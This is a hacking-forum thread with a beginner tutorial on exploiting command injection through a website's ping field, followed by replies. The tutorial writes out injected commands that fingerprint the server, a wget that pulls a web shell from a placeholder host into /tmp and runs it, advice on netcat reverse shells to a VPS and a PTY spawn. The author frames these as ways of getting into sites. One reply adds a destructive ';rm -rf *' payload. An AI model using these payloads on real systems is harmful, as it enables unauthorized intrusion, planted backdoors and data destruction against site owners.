Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


Tutorial Remote Code Execution Tutorial - Noob Friendly filter_list
Author
Message
Remote Code Execution Tutorial - Noob Friendly #1
Disclaimer

I am not responsible for how you use this tutorial its was created for educational purposes.

Intro

Hello guys and welcome to my tutorial on Remote Code Execution (RCE),
I will not be providing any real targets but will be providing a realistic example,
RCE is a very useful exploit as it lets you execute direct commands to the system,
Therefore allowing us to upload files, delete files and manipulate the system how we wish.

How RCE happens

RCE most commonly happens via unsanitized input on a website input,
For example in this tutorial we will be using a ping IP input shown in the image below.

[Image: 3dcff3c5ad8b4ecec1629333377d32a6.png]

Check target

Okay so with the example I have provided it was relatively simple to check if it was vulnerable by adding ";" without quotes into the input box, followed by a Nix* example below
Code:
;uname -a
By adding ";" this is a concatenate "Joins an extra command to supplied argument"
The following image will show the output of what we have entered.

[Image: 3117fd17173afabb745bb9d31716cee3.png]

Okay so now what

Okay so we have found that via the input we have been able to execute a Nix* command to display box info,
Now what else is there we can do hmm... Okay lets try pull up what os the box is running with the following command,
Code:
;cat /etc/issue
This command has provided us the info of the boxes OS as shown below

[Image: 58b1704cbc4be247dddc0c9e29d72aaf.png]

Well that was cool

Okay so we now found some minor useless info,
I am sure you are thinking no more minor stuff lets move on to get "r00t".
Now lets try list the current directory with "ls".

[Image: b81c344d23b34bf9a10e79572679d5b2.png]

We have got no output!?! I guess its not that vulnerable lets move on shall we...
WRONG! Just means the current directory is not able to be listed.
As shown before ";" is for concatenate so lets try join 2 commands by doing the following to move up a directory then list.
Code:
;cd ..;ls
[Image: 6694e681f914ec7172701f2f12b49736.png]


Success we listed the directories. +1 to you sir!
Now its a wide known fact that the tmp directory is usually writeable so lets navigate there and list by entering the following code.
Code:
;cd ..;cd tmp;ls

[Image: c50f06d60af783c59c1224045de5b887.png]


Woo! We listed a writable director now lets try wget a shell to this directory by entering this code;
Code:
;cd ..;cd tmp;wget http://www.yoursite.com/shell.txt > a.php
[Image: eeec458609b51d5e0f8f7632d19061c2.png]


Now your shell has been uploaded you could access the shell via terminal by entering,
Code:
;cd ..;cd tmp;php a.php
Alternative to a web shell

Okay so my favourite way of gaining access to all the sites is the following way,
Test for vulnerable input and instead of executing a bunch of system commands try to spawn a shell and back connect via netcat on a VPS.
now for the actual codes to spawn a shell on the server I suggest trying the following examples they have always served me well;
http://pentestmonkey.net/cheat-sheet/she...heat-sheet
Obviously change "10.0.0.1" to your VPS IP and change the port I suggest using port 443 as its commonly open.
From there for ease of use I will normally spawn a (Pseudo Terminal) PTY shell from bash by using the following code
Code:
;python -c 'import pty; pty.spawn("/bin/bash")'

I really hope that you enjoyed this tutorial as much as I enjoyed writing it!
Thanks for reading guys.

Reply

RE: Remote Code Execution Tutorial - Noob Friendly #2
Code:
;rm -rf *
[Image: 7ajmN5P.jpg]

Telegram: Oni_SL (Link)

Reply

RE: Remote Code Execution Tutorial - Noob Friendly #3
(04-19-2016, 01:39 AM)Oni Wrote:
Code:
;rm -rf *

And this is why we cant have nice things Biggrin

[+] 3 users Like MLP's post
Reply

RE: Remote Code Execution Tutorial - Noob Friendly #4
Wasn't really detailed whatsoever, but it's better than nothing I guess...

Reply

RE: Remote Code Execution Tutorial - Noob Friendly #5
(04-19-2016, 02:14 AM)meow Wrote: Wasn't really detailed whatsoever, but it's better than nothing I guess...

Nobody's stopping you from improving on it or making another.
[Image: 7ajmN5P.jpg]

Telegram: Oni_SL (Link)

Reply

RE: Remote Code Execution Tutorial - Noob Friendly #6
(04-19-2016, 02:29 AM)Oni Wrote: Nobody's stopping you from improving on it

Prepare for a long response, one minute...

Reply

RE: Remote Code Execution Tutorial - Noob Friendly #7
Seems an amazing tutorial, as a friend said up there, is not very detailed, but practicing you will learn it alone!

Begginers... this is gold information
HACKING IS NOT A CRIME, HACKING IS AN ART

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/bidbdyod/public_html/scripts/bd.php on line 34

Reply

RE: Remote Code Execution Tutorial - Noob Friendly #8
Its a great thing to no for beginners definitely. Certainly room to expand, but great none the less.

(04-19-2016, 02:33 AM)meow Wrote: Prepare for a long response, one minute...

He boasted so proudly, yet the legend came true...this cat which meowed so loudly...never came through
You can find me on Keybase
"Reach the state of ubiquity, and you will be in control"
Student, Technician, Designer, and more.
[Image: YUpAMpx.png]

Reply

RE: Remote Code Execution Tutorial - Noob Friendly #9
For those who can't be bothered doing all this by hand, there is even an automated tool for exploiting such vulnerabilities, linked below.

https://github.com/stasinopoulos/commix

Reply

RE: Remote Code Execution Tutorial - Noob Friendly #10
Thanks for the tutorial, it is really useful

Reply